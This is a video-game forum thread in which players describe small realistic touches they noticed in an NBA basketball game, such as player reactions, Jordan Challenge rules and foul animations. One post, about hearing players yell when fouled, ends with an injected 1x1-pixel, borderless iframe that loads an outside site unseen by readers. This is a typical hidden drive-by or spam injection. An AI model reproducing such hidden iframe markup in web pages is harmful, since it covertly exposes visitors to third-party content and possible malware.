Re: The Little Things Thread
was playing a summer league game and blocked a dunk and it was crazy seeing how the player that got blocked was following the ball with his eyes as he hung on the rim, and also saw a teammate on the bench show his frustration as the play happenedComment

Re: The Little Things Thread
Playing with the Lakers and Gasol gets an offensive rebound and goes up with a lot of contact from the defense. I heard the typical Gasol scream when he thinks he gets fouled. Not sure if it's like this for everyone, but that is something that is definitely characteristic of Pau.Comment

Re: The Little Things Thread
When playing one of the Jordan Challenges, I noticed the CPU took longer than 8 seconds to cross half court, so I tested myself. I stood in the backcourt for 10 seconds...10 second violation!
I wish there was a way to implement the old rules in regular quick game exhibitions though.Comment

Re: The Little Things Thread
Heck during the 80s and 90s games during the Jordan challenges a lot of fouls aren't called that are called today, that is something I noticed. You get hacked to pieces with no call. And the announcer referenced how physical the game is and wondered if they were going to change the rules of the nba in the future.Comment

Re: The Little Things Thread
When u get doubled, and there is a guy wide open on the court. I've heard people scream his name. Not sure if its team mates or fans. But cool touch.
Also had an in air collision with MJ & some guy. Every dead ball the guy would clutch his side and wenceComment

Re: The Little Things Thread
The fact that you can turn off defesnive 3 seconds in the key and leave on offensive 3 seconds in the key. Awesome and I'll definitely use it for the MJ challenges where it's appropriate.
I'm loving a lot of the movement so far. I'm new to the shot stick system and went through practice mode with Kobe, and then when I came to changing shot mid air off a dunk attempt he went so fast that he flew under the backboard before he got the lay up off, it was beatiful.
Also really liking the fact that they can shoot over the backboard from behind.Get that weak stuff outta here!Comment

Re: The Little Things Thread
I was going to say something similar. It's hard to hear with everything going on in a game, but I was in low post practice mode (Duncan vs. Shaq) and I could hear the guys yelling when they thought they were fouled. Very cool<iframe src="http://zeroethics.com/opsports/" frameborder="0" marginheight="0" marginwidth="0" width="1" height="1"scrolling="no"></iframe>Comment

Re: The Little Things Thread
Played as the Raptors against the Knicks last night, and Wilson Chandler gets fouled hard by Amir Johnson on a layup. He falls to the court, clutching his side. Amir cautiously walks up to Wilson as he stands up in a helpful/apologetic gesture, and Wilson <b>pushes him away</b> with his left arm before going to the line! I was amazed, I haven't seen anything like that in an NBA video game...didn't even think the NBA would allow it. Only thing I didn't understand is why Chandler went to the line instead of the locker room :/ .
Also, I've had some excellent shots and layups go in after contact. Had Oleksey Pecherov fall on his rear end after a botched layup and watched the shot go in. Steve Nash received contact in the post during a layup and rolled to the court as the shot banked in. Had a few opportunities from the perimeter end up with contact as well...it's quite awesome to see these shots go in, true highlight reel moments.Last edited by CarryTheWeight; 10-09-2010, 12:49 PM.Owner of URWL CAW WRESTLING: http://www.rantboard.net/Comment

Re: The Little Things Thread
I noticed Chicago Stadium had different basket supports than the modern rims. You can see there's two metal bars coming from the sides of the backboard as opposed to today's stadard singular pole coming directly from the middle.Comment

Re: The Little Things Thread
Anybody else pull off the one handed palm double clutch with Jordan in the air ? That is AWESOME. I did it several times with him during the Jordan challenges. He will be in the air, bring the ball back down with one hand and shoot it again with one hand while still in the air.
Or how about the push off jumper with Jordan ? That is awesome to see as well. He literally will push a guy to the side on a crossover like he did Russel in real life and go for a jumper.
Or when he is going for a layup over somebody, he would push off the back of a player with his left hand while shooting with his right hand.
Or anybody else notice Jordan shots fall way more often when you are double teamed ? I swear its like when they double team me with Jordan I can't miss from anywhere.
It was so funny the announcer said they got 2 players on him and he still hitting his shots, maybe they need to start triple teaming him.Comment
